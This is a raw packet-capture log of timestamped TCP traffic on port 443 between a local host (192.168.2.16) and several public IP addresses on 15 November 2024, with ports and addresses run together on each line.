                                                                                      Nov 15, 2024 18:09:03.150548935 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:03.151084900 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:03.151102066 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.153238058 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.153332949 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.154521942 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.154742956 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.154777050 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.160630941 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:03.160672903 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.160737038 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:03.160868883 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:03.160929918 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.161025047 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:03.161047935 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.161050081 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:03.161202908 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:03.161215067 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.764362097 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.764760971 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.764787912 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.765110970 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.766689062 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.766753912 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.766834974 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.807336092 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.902441978 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.902508020 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.902582884 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.903162003 CET62644443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:03.903191090 CET44362644104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.059674978 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.060108900 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.060137987 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.060611963 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.060996056 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.061089039 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.061165094 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.061187983 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.061253071 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.068761110 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.069082022 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.069147110 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.070302963 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.070697069 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.070884943 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.113712072 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.726005077 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.726234913 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.726383924 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.727864981 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.727895975 CET4436264591.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:04.727910995 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.727952957 CET62645443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.728657007 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:04.775336981 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.027663946 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.027725935 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.027745962 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.027832031 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:05.027901888 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.043801069 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.043850899 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.043931961 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.044117928 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.044138908 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.046588898 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.046802044 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:05.046868086 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.046941996 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:05.063699007 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.063873053 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.063882113 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:05.063910961 CET4436264691.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.063942909 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:05.063977003 CET62646443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:09:05.655956030 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.656270027 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.656310081 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.658004999 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.658094883 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.658951998 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.659053087 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.659085035 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.703346014 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.708709955 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.708723068 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.756706953 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.827167988 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.827227116 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.827264071 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.827296972 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.827297926 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.827353001 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.827389002 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.827415943 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.827469110 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.827482939 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.831816912 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.831856012 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.831882954 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.831891060 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.831932068 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.831938982 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.884721994 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.944092989 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944194078 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944231033 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944253922 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.944267035 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944310904 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.944318056 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944443941 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944480896 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944493055 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.944500923 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:05.944541931 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:05.984798908 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.027735949 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.027753115 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061227083 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061278105 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061300993 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.061323881 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061373949 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.061378002 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061394930 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061444044 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.061456919 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061712980 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.061763048 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.061779976 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.102088928 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.102128029 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.102152109 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.102164030 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.102205992 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.102211952 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.155690908 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.178225994 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.178283930 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.178340912 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.178360939 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.178431034 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.178431988 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.178482056 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.178642988 CET62647443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:06.178674936 CET44362647104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.188699007 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.188730001 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.188791037 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.188972950 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.188990116 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.239634991 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.239681959 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.239747047 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.239936113 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.239945889 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.794909954 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.795171022 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.795202017 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.796628952 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.796690941 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.796964884 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.797039986 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.797096968 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.797105074 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.838722944 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.937230110 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.937308073 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.937364101 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.937391043 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.938123941 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.938317060 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.938330889 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.940412045 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.940480947 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.941318989 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.941402912 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.941476107 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.941482067 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.941982985 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.942023039 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.942038059 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.942044020 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.942085981 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.946635962 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.946733952 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.946774960 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.946778059 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.946789026 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.946821928 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:06.951369047 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:06.981705904 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:06.997759104 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.054649115 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.054749966 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.054789066 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.054821014 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.054867983 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.054907084 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.054927111 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.055151939 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.055227041 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.055229902 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.055238962 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.055277109 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.055718899 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.107568979 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.107742071 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.107855082 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:07.108114004 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:07.108134985 CET44362649147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.108170986 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:07.108186960 CET62649443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:07.108866930 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:07.108920097 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.108998060 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:07.109236956 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:07.109256029 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.109699011 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.109724045 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.157748938 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.171793938 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.171864033 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.171895981 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.171925068 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.171946049 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.171956062 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.171967030 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.171989918 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.172018051 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.172028065 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.172663927 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.172713041 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.172724009 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.172729969 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.172775030 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.172779083 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.221776962 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.221807003 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.269706011 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.288836002 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.288894892 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.288923979 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.289001942 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.289012909 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.289052963 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.289062023 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.289114952 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.289319992 CET62648443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:07.289334059 CET44362648104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:07.300720930 CET49678443192.168.2.1620.189.173.10
                                                                                      Nov 15, 2024 18:09:08.661767006 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:08.662060022 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:08.662087917 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:08.663193941 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:08.663485050 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:08.663614035 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:08.663619041 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:08.663649082 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:08.718691111 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.018332958 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.018404961 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.018425941 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.018486977 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.018487930 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.018533945 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.018543005 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.018543005 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.018556118 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.018585920 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.018598080 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.018625975 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.018646955 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.142154932 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.142218113 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.142288923 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.142364979 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.142405033 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.142426968 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.266598940 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.266666889 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.266721964 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.266753912 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.266772985 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.266804934 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.405705929 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.405771017 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.405829906 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.405900002 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.405936003 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.405958891 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.529995918 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.530061960 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.530122995 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.530191898 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.530229092 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.530252934 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.655410051 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.655473948 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.655530930 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.655597925 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.655637980 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.655659914 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.778301001 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.778373957 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.778495073 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.778522015 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.778556108 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.778592110 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.902157068 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.902184010 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.902306080 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.902331114 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.902368069 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.903374910 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.903393984 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.903465986 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:09.903471947 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:09.903630018 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.027242899 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.027303934 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.027447939 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.027447939 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.027478933 CET44362650147.79.74.176192.168.2.16
